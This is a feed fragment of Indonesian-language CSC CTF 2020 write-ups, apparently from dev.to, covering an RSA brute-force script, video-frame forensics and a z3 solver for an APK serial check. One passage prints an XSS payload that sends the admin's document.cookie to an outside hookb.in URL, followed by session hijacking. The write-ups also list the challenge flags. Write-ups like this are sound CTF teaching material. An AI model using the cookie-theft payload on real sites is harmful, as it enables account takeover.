&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2F0Jb5vDVJ0YGEMKu-J8tQ4rYQ82YITHM6amsfa_5-7KPnyClX-1vqNX_rBvOc_V7rIIcrbzPkP2ZS7MDPRSdN5Hp-VybEwMqZsFzKhk0OfsS9w8Bdwd1m38JoX6OepT7Y4FGRfPTc" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2F0Jb5vDVJ0YGEMKu-J8tQ4rYQ82YITHM6amsfa_5-7KPnyClX-1vqNX_rBvOc_V7rIIcrbzPkP2ZS7MDPRSdN5Hp-VybEwMqZsFzKhk0OfsS9w8Bdwd1m38JoX6OepT7Y4FGRfPTc" alt="chal" width="963" height="504"&gt;&lt;/a&gt;&lt;br&gt;
Flag: CSCCTF{2020_Pollution_4nd_Corrupt1on}&lt;/p&gt;

&lt;h2&gt;
  
  
  Authey
&lt;/h2&gt;

&lt;p&gt;Adanya vuln xss pada saat compose message content yang dikirimkan akan dieksekusi pada browser si &lt;a href="mailto:admin@getflaghere.com"&gt;admin@getflaghere.com&lt;/a&gt;. Vuln tersebut dapat dimanfaatkan untuk mencuri cookie admin.&lt;/p&gt;

&lt;p&gt;Pada input content kami menggunakan payload sebagai berikut:&lt;/p&gt;

&lt;p&gt;window.location.href=”&lt;a href="https://hookb.in/BY7VJGN69jFLDDx31Pjo?c=%E2%80%9D" rel="noopener noreferrer"&gt;https://hookb.in/BY7VJGN69jFLDDx31Pjo?c=”&lt;/a&gt; + document.cookie&lt;/p&gt;

&lt;p&gt;Pada hookbin kami berhasil mendapatkan cookie milik admin&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FRP1V3x1w3tjW7q9SdMjI70ML5_cY2sbOx6FjBnPkmPKXfdR7Eb590nhzDR9Ohnw7bxGeVAsbqSnuODQZz6vqMsKJIiuoiPfRVrF4H7_7KcdlBpoio7bIIkH5zoLSqLkMLL4kdOJD" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FRP1V3x1w3tjW7q9SdMjI70ML5_cY2sbOx6FjBnPkmPKXfdR7Eb590nhzDR9Ohnw7bxGeVAsbqSnuODQZz6vqMsKJIiuoiPfRVrF4H7_7KcdlBpoio7bIIkH5zoLSqLkMLL4kdOJD" alt="chal" width="1202" height="687"&gt;&lt;/a&gt;&lt;br&gt;
Kami mengganti cookie kami menggunakan cookie milik admin:&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FhXEeq5fJw7HGSB09NicmIdrZllep8nH7VAGaVFzbKWczwvh7xFNHwyfEyf4hxfCiFpdy22IUTRUnBstYowzxcyaLDmpl_73rAfTJk7Dcqw7FkMEJ-KYfCcoF40FKLMZwDmeiUJ_C" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FhXEeq5fJw7HGSB09NicmIdrZllep8nH7VAGaVFzbKWczwvh7xFNHwyfEyf4hxfCiFpdy22IUTRUnBstYowzxcyaLDmpl_73rAfTJk7Dcqw7FkMEJ-KYfCcoF40FKLMZwDmeiUJ_C" alt="f12" width="1366" height="318"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FgnD7cjsAvMNFuJQUKowPlMH2Mv6MFyZnV-zLRWtGGBY1TjgnGEdye6sipJSx1Hc-LwGhmxhAgMLVxMyvsxcTEX80LcCzFygLWQAc8-wrcZhSr5veJmfdfcIxZEZtoNHRqBqEB7n4" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FgnD7cjsAvMNFuJQUKowPlMH2Mv6MFyZnV-zLRWtGGBY1TjgnGEdye6sipJSx1Hc-LwGhmxhAgMLVxMyvsxcTEX80LcCzFygLWQAc8-wrcZhSr5veJmfdfcIxZEZtoNHRqBqEB7n4" alt="web" width="767" height="470"&gt;&lt;/a&gt;&lt;br&gt;
Flag: CSCCTF{great_cost_for_00pen_redirection}&lt;/p&gt;

</description>
      <category>cryptography</category>
      <category>reverseengineering</category>
      <category>webexploitation</category>
      <category>ctf</category>
    </item>
    <item>
      <title>CSC CTF 2020 Write Up</title>
      <dc:creator>yudi</dc:creator>
      <pubDate>Mon, 07 Dec 2020 14:22:15 +0000</pubDate>
      <link>https://dev.to/yudi7ll/csc-ctf-2020-write-up-53eo</link>
      <guid>https://dev.to/yudi7ll/csc-ctf-2020-write-up-53eo</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa7a2qsa2qhy04el69q3z.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa7a2qsa2qhy04el69q3z.jpg" alt="Tanamkan di hati iman yang kokoh" width="720" height="714"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tim Member&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/ChaO-0" rel="noopener noreferrer"&gt;ChaO&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anehman" rel="noopener noreferrer"&gt;AnehMan&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/yudi7ll" rel="noopener noreferrer"&gt;MBEERRR&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Daftar Isi
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
Cryptography

&lt;ul&gt;
&lt;li&gt;Here We Go Again&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Forensic

&lt;ul&gt;
&lt;li&gt;Aing, Robot&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Reverse Engineering

&lt;ul&gt;
&lt;li&gt;Welcome to CSCCTF&lt;/li&gt;
&lt;li&gt;Higher Please&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Web Exploitation

&lt;ul&gt;
&lt;li&gt;Speliberg&lt;/li&gt;
&lt;li&gt;not-so-smart&lt;/li&gt;
&lt;li&gt;iHateDevelopers&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;




&lt;h1&gt;
  
  
  Cryptography
&lt;/h1&gt;

&lt;h2&gt;
  
  
  Here We Go Again
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Executive Summary
&lt;/h3&gt;

&lt;p&gt;Another good old menu in our cryptography section&lt;br&gt;
Author: EternalBeats&lt;/p&gt;
&lt;h3&gt;
  
  
  Technical Report
&lt;/h3&gt;

&lt;p&gt;Diberikan file encrypted.txt. Berikut penampakannya&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2F42MU1Yl_2JmC5y2bB6_NuLg6MUVe-VwKqLeCD1jBcGr20nBALvxvRHfohO4sLT4uVWk5MXKFSrKpreNrl0tPckwolmZ_YtE-IsCGZMDs9rLs9NT1AbOaRamCP869fRrjW_GioRiM" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2F42MU1Yl_2JmC5y2bB6_NuLg6MUVe-VwKqLeCD1jBcGr20nBALvxvRHfohO4sLT4uVWk5MXKFSrKpreNrl0tPckwolmZ_YtE-IsCGZMDs9rLs9NT1AbOaRamCP869fRrjW_GioRiM" alt="encrypted.txt" width="781" height="563"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Ada 1 modulus, 1 eksponen, dan 36 ciphertext. Kami menduga bahwa tiap karakter flag di encrypt. Jadi kami melakukan brute force, jika karakter yang di encrypt sama dengan ciphertext index ke-i, maka kita menemukan karakter flag. Berikut adalah full scriptnya&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;Crypto.Util.number&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;

&lt;span class="n"&gt;var&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;encrypted.txt&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;r&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;var&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;   &lt;span class="c1"&gt;#n,e,cipher[]
&lt;/span&gt;
&lt;span class="n"&gt;flag&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;""&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
   &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;m&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
       &lt;span class="n"&gt;res&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;pow&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;m&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
       &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;res&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
           &lt;span class="n"&gt;flag&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="nf"&gt;chr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;m&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
           &lt;span class="k"&gt;break&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;FLAG:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;flag&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Hasil&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2F_yp2i9h-fipRHDXerLKKo3cI_3irQpEcu7WN_ZQr-lSPGyuW6a4ZH4e8ANLhXqlFDBZwQoVuCh-qLUY8OY9d_LgtjMsWjFlXEL4gHwjf4I6yIYflqQXlGYAcdJNFPoGcod3awAYF" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2F_yp2i9h-fipRHDXerLKKo3cI_3irQpEcu7WN_ZQr-lSPGyuW6a4ZH4e8ANLhXqlFDBZwQoVuCh-qLUY8OY9d_LgtjMsWjFlXEL4gHwjf4I6yIYflqQXlGYAcdJNFPoGcod3awAYF" alt="hasil" width="746" height="64"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag
&lt;/h3&gt;

&lt;p&gt;Flag: CSCCTF{Rs4_d3crYpt10n_By_3ncRypT10n}&lt;/p&gt;

&lt;h1&gt;
  
  
  Forensic
&lt;/h1&gt;

&lt;h2&gt;
  
  
  Aing, Robot
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Executive Summary
&lt;/h3&gt;

&lt;p&gt;Sketch like Sonny &lt;a href="https://www.youtube.com/watch?v=Bs60aWyLrnI" rel="noopener noreferrer"&gt;https://www.youtube.com/watch?v=Bs60aWyLrnI&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Author: Bigby&lt;/p&gt;

&lt;p&gt;File: robot.mp4&lt;/p&gt;

&lt;h3&gt;
  
  
  Technical Report
&lt;/h3&gt;

&lt;p&gt;Diberikam sebuah video dengan background putih dan kami melihat di beberapa frame pada video terdapat garis - garis hitam dengan pola yang menarik. Hal pertama yang kami pikirkan adalah mencoba menggabungkan semua frame pada video tersebut dan menghapus background putih. Berikut scriptnya:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh3.googleusercontent.com%2FiLp_738wmWqsty6M-1v-IEHlSNlkEnKfZk0kUWVtU37xgwP2z0E1ClSiQ0gea_FJjw0x8Q90iCfSW7r-DJMx712MoFiM_4-kc9xgL1iZFyxIqKrDRGCfxlA2j1MHXfOAsAVoWMlz" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh3.googleusercontent.com%2FiLp_738wmWqsty6M-1v-IEHlSNlkEnKfZk0kUWVtU37xgwP2z0E1ClSiQ0gea_FJjw0x8Q90iCfSW7r-DJMx712MoFiM_4-kc9xgL1iZFyxIqKrDRGCfxlA2j1MHXfOAsAVoWMlz" alt="script" width="686" height="702"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh3.googleusercontent.com%2FeWTshaGrajlYghw2JZATQddOh9XE_l365O98D_7w0VVWbMMTIbpZqIhnF13IRwAcS6MIo31fw7BB9jtzI5BiyC8OEXoOXyCBBPiS51391b26M7Bu17DM3gNstfqAbJe4ljMTJ5X_" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh3.googleusercontent.com%2FeWTshaGrajlYghw2JZATQddOh9XE_l365O98D_7w0VVWbMMTIbpZqIhnF13IRwAcS6MIo31fw7BB9jtzI5BiyC8OEXoOXyCBBPiS51391b26M7Bu17DM3gNstfqAbJe4ljMTJ5X_" alt="script2" width="492" height="247"&gt;&lt;/a&gt;&lt;br&gt;
Setelah dijalankan kami mendapatkan hasil seperti ini&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh3.googleusercontent.com%2FnQOEgouLEaINaeKDdLu1gsQr2oLcinK1uzwAqcu_33HP956n6lDZoR4sc1FX_xwLjpTNbxp1U07ApyPD8IAeS3-j6eheZ1nZx_D1CReKOK_o4kMY1XggNi2NUEmwIkLSzKhUmUCd" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh3.googleusercontent.com%2FnQOEgouLEaINaeKDdLu1gsQr2oLcinK1uzwAqcu_33HP956n6lDZoR4sc1FX_xwLjpTNbxp1U07ApyPD8IAeS3-j6eheZ1nZx_D1CReKOK_o4kMY1XggNi2NUEmwIkLSzKhUmUCd" alt="hasil" width="1366" height="742"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Semua file tersebut adalah frame dari video yang sudah diedit backgroundnya menjadi transparan. Kami kemudian menggabungkan semua frame tersebut menggunakan gimp. Berikut penampakannya:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FHQeU4J6XpuVTYg6xeOR3L0gNSwy5-nWSrXtrYUIXfoOSUN4HU1GUAzfGK7GYlz2hlWLVzQKhaHCGub7AHx0g0wODd1OoOKrv7S_JNHj_qqHQ6lNdP7OLXq7f6o6WDajszeP-vh_V" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FHQeU4J6XpuVTYg6xeOR3L0gNSwy5-nWSrXtrYUIXfoOSUN4HU1GUAzfGK7GYlz2hlWLVzQKhaHCGub7AHx0g0wODd1OoOKrv7S_JNHj_qqHQ6lNdP7OLXq7f6o6WDajszeP-vh_V" alt="gimp" width="1366" height="742"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  FLAG
&lt;/h3&gt;

&lt;p&gt;CSCCTF{M4NT4P_53K4R4N9_B3rS1hK4n_F1L3}&lt;/p&gt;
&lt;h1&gt;
  
  
  Reverse Engineering
&lt;/h1&gt;
&lt;h2&gt;
  
  
  Welcome to CSCCTF
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Executive Summary
&lt;/h3&gt;

&lt;p&gt;Welcome to CSCCTF! Begin your reverse engineering journey from this problem. Can you find the key?&lt;br&gt;
Author: darmads&lt;/p&gt;
&lt;h3&gt;
  
  
  Technical Report
&lt;/h3&gt;

&lt;p&gt;Diberikan sebuah file apk. Langsung saja decompile online, dan baca sourcenya. Kode yang terpenting terdapat pada line code berikut ini.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;public final boolean check(String kunci) {

       String str = kunci;

       Intrinsics.checkParameterIsNotNull(str, "kunci");

       if (kunci.length() &amp;gt;= 25 &amp;amp;&amp;amp;

           str.charAt(20) - str.charAt(0) == 24 &amp;amp;&amp;amp;

           str.charAt(8) + str.charAt(5) == 126 &amp;amp;&amp;amp;

           str.charAt(14) * str.charAt(5) == 3696 &amp;amp;&amp;amp;

            str.charAt(21) - str.charAt(1) == 33 &amp;amp;&amp;amp;

            str.charAt(10) - str.charAt(0) == 2 &amp;amp;&amp;amp;

            str.charAt(17) - str.charAt(0) == 19 &amp;amp;&amp;amp;

            str.charAt(17) * str.charAt(1) == 3848 &amp;amp;&amp;amp;

            str.charAt(4) + str.charAt(6) == 123 &amp;amp;&amp;amp;

            str.charAt(13) * str.charAt(16) == 4488 &amp;amp;&amp;amp;

            str.charAt(1) * str.charAt(6) == 2600 &amp;amp;&amp;amp;

            str.charAt(13) * str.charAt(23) == 3536 &amp;amp;&amp;amp;

            str.charAt(8) - str.charAt(5) == 14 &amp;amp;&amp;amp;

            str.charAt(15) + str.charAt(5) == 123 &amp;amp;&amp;amp;

            str.charAt(20) - str.charAt(17) == 5 &amp;amp;&amp;amp;

            str.charAt(17) + str.charAt(16) == 140 &amp;amp;&amp;amp;

            str.charAt(16) + str.charAt(14) == 132 &amp;amp;&amp;amp;

            str.charAt(3) * str.charAt(6) == 4250 &amp;amp;&amp;amp;

            str.charAt(18) + str.charAt(14) == 145 &amp;amp;&amp;amp;

            str.charAt(13) * 2 == 136 &amp;amp;&amp;amp;

            str.charAt(17) - str.charAt(10) == 17 &amp;amp;&amp;amp;

            str.charAt(11) + str.charAt(8) == 145 &amp;amp;&amp;amp;

            str.charAt(9) + str.charAt(1) == 135 &amp;amp;&amp;amp;

            str.charAt(11) + str.charAt(24) == 146 &amp;amp;&amp;amp;

            str.charAt(3) - str.charAt(7) == 11 &amp;amp;&amp;amp;

            str.charAt(0) - str.charAt(2) == 2 &amp;amp;&amp;amp;

            str.charAt(11) - str.charAt(13) == 7 &amp;amp;&amp;amp;

            str.charAt(3) + str.charAt(4) == 158 &amp;amp;&amp;amp;

            str.charAt(3) - str.charAt(16) == 19 &amp;amp;&amp;amp;

            str.charAt(4) - str.charAt(14) == 7 &amp;amp;&amp;amp;

            str.charAt(12) * str.charAt(1) == 4056 &amp;amp;&amp;amp;

            str.charAt(20) + str.charAt(8) == 149 &amp;amp;&amp;amp;

            str.charAt(9) - str.charAt(4) == 10 &amp;amp;&amp;amp;

            str.charAt(9) - str.charAt(6) == 33 &amp;amp;&amp;amp;

            str.charAt(9) * str.charAt(13) == 5644 &amp;amp;&amp;amp;

            str.charAt(16) + str.charAt(5) == 122 &amp;amp;&amp;amp;

            str.charAt(16) - str.charAt(10) == 9 &amp;amp;&amp;amp;

            str.charAt(17) + str.charAt(24) == 145 &amp;amp;&amp;amp;

            str.charAt(20) - str.charAt(13) == 11 &amp;amp;&amp;amp;

            str.charAt(18) * str.charAt(11) == 5925 &amp;amp;&amp;amp;

            str.charAt(21) * str.charAt(23) == 4420 &amp;amp;&amp;amp;

            str.charAt(22) * str.charAt(7) == 5698 &amp;amp;&amp;amp;

            str.charAt(15) - str.charAt(19) == 12 &amp;amp;&amp;amp;

            str.charAt(16) - str.charAt(1) == 14 &amp;amp;&amp;amp;

            str.charAt(3) - str.charAt(13) == 17 &amp;amp;&amp;amp;

            str.charAt(12) * str.charAt(8) == 5460 &amp;amp;&amp;amp;

            str.charAt(21) * str.charAt(13) == 5780 &amp;amp;&amp;amp;

            str.charAt(7) * str.charAt(1) == 3848 &amp;amp;&amp;amp;

            str.charAt(22) + str.charAt(6) == 127 &amp;amp;&amp;amp;

            str.charAt(13) + str.charAt(5) == 124 &amp;amp;&amp;amp;

            str.charAt(24) + str.charAt(1) == 123) {

           return true;

       }

       return false;

   }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Sepertinya, apk tersebut meminta sebuah serial key untuk dimasukkan, jika true maka akan menghasilkan flag. Dan pengecekan serial key akan dilakukan pada line code diatas. Untuk men-generate serial key, kami menggunakan z3solver. Berikut kode yang kami buat untuk mendapatkan serial key tersebut.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from z3 import *

vars = [Int(str(i)) for i in range(25)]

s = Solver()

s.add(vars[20] - vars[0] == 24)

s.add(vars[8]+ vars[5] == 126 )

s.add(vars[14] * vars[5] == 3696)

s.add(vars[21] - vars[1] == 33)

s.add(vars[10] - vars[0] == 2)

s.add(vars[17] - vars[0] == 19)

s.add(vars[17] * vars[1] == 3848)

s.add(vars[4]+ vars[6] == 123 )

s.add(vars[13] * vars[16] == 4488)

s.add(vars[1]* vars[6] == 2600 )

s.add(vars[13] * vars[23] == 3536)

s.add(vars[8]- vars[5] == 14 )

s.add(vars[15] + vars[5] == 123)

s.add(vars[20] - vars[17] == 5)

s.add(vars[17] + vars[16] == 140)

s.add(vars[16] + vars[14] == 132)

s.add(vars[3]* vars[6] == 4250 )

s.add(vars[18] + vars[14] == 145)

s.add(vars[13] * 2 == 136)

s.add(vars[17] - vars[10] == 17)

s.add(vars[11] + vars[8] == 145)

s.add(vars[9]+ vars[1] == 135 )

s.add(vars[11] + vars[24] == 146)

s.add(vars[3]- vars[7] == 11 )

s.add(vars[0]- vars[2] == 2 )

s.add(vars[11] - vars[13] == 7)

s.add(vars[3]+ vars[4] == 158 )

s.add(vars[3]- vars[16] == 19 )

s.add(vars[4]- vars[14] == 7 )

s.add(vars[12] * vars[1] == 4056)

s.add(vars[20] + vars[8] == 149)

s.add(vars[9]- vars[4] == 10 )

s.add(vars[9]- vars[6] == 33 )

s.add(vars[9]* vars[13] == 5644 )

s.add(vars[16] + vars[5] == 122)

s.add(vars[16] - vars[10] == 9)

s.add(vars[17] + vars[24] == 145)

s.add(vars[20] - vars[13] == 11)

s.add(vars[18] * vars[11] == 5925)

s.add(vars[21] * vars[23] == 4420)

s.add(vars[22] * vars[7] == 5698)

s.add(vars[15] - vars[19] == 12)

s.add(vars[16] - vars[1] == 14)

s.add(vars[3]- vars[13] == 17 )

s.add(vars[12] * vars[8] == 5460)

s.add(vars[21] * vars[13] == 5780)

s.add(vars[7]* vars[1] == 3848 )

s.add(vars[22] + vars[6] == 127)

s.add(vars[13] + vars[5] == 124)

s.add(vars[24] + vars[1] == 123)

print s.check()

print s.model()

w = {5 : 56,

21 : 85,

3 : 85,

19 : 55,

22 : 77,

23 : 52,

18 : 79,

20 : 79,

16 : 66,

9 : 83,

6 : 50,

4 : 73,

8 : 70,

12 : 78,

14 : 66,

11 : 75,

2 : 53,

7 : 74,

24 : 71,

13 : 68,

17 : 74,

15 : 67,

10 : 57,

1 : 52,

0 : 55}

test = []

for i in w:

 test.append(i)

serial = ''

for i in range(len(w)):

 serial += chr(w[test[i]])

print serial
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Jalankan scriptnya.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FroM8U3bjP6kwwLXbH0cw_Cy05a4zeStKGV_5jCWWq7A9YqQeT-dxmR6iPJT2unZ5snAWX-vONGBI5tqdc1tFucDO7FFPqzfX-9mKVtp6pocsgfuLeIGUlCEYpnNRepxBu8yLAAMh" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FroM8U3bjP6kwwLXbH0cw_Cy05a4zeStKGV_5jCWWq7A9YqQeT-dxmR6iPJT2unZ5snAWX-vONGBI5tqdc1tFucDO7FFPqzfX-9mKVtp6pocsgfuLeIGUlCEYpnNRepxBu8yLAAMh" alt="script" width="197" height="77"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Akan didapatkan serial key seperti itu, langsung saja masukkan ke apknya.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2FI1l4DcETzTQrcC6K_x-hslqTp0xgwdPX48mWwguVxR3tjVUg0G2Q6ApGW-oodb23abaLGBGi_dmBFllik6U7yDEJGnBveLKlCVgVn3LWEfE_Fzg31ch0vgP_lOpkf11iSK5Qdqo6" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2FI1l4DcETzTQrcC6K_x-hslqTp0xgwdPX48mWwguVxR3tjVUg0G2Q6ApGW-oodb23abaLGBGi_dmBFllik6U7yDEJGnBveLKlCVgVn3LWEfE_Fzg31ch0vgP_lOpkf11iSK5Qdqo6" alt="ss" width="640" height="1280"&gt;&lt;/a&gt;&lt;/p&gt;

